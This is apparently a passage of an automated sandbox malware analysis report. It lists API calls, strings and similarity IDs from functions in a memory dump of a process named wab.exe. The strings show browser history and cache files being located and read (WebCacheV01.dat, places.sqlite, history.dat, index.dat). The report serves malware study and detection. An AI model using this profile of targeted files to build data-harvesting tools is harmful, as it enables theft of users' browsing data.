                                                                                                                • String ID:
                                                                                                                • API String ID: 2911713577-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp
                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                Strings
                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                • API String ID: 2705122986-2036018995
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                • String ID: /nosort$/sort
                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                Strings
                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                • API String ID: 3354267031-2114579845
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChangeCloseFindNotificationSleep
                                                                                                                • String ID: }A
                                                                                                                • API String ID: 1821831730-2138825249
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                • String ID: r!A
                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                • memcmp.MSVCRT ref: 00444BA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcmp
                                                                                                                • String ID: $$8
                                                                                                                • API String ID: 2808797137-435121686
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1042154641-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                • API String ID: 3093078384-467022611
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 839530781-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID: *.*$index.dat
                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@mallocmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3831604043-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1156039329-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 1631957507-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1125800050-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: d
                                                                                                                • API String ID: 0-2564639436
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: BINARY
                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1161345128-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp
                                                                                                                • String ID: /stext
                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                • String ID:
                                                                                                                • API String ID: 159017214-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3150196962-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                • API String ID: 2803490479-1168259600
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmpmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1065087418-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1297977491-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                  • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1481295809-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3150196962-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
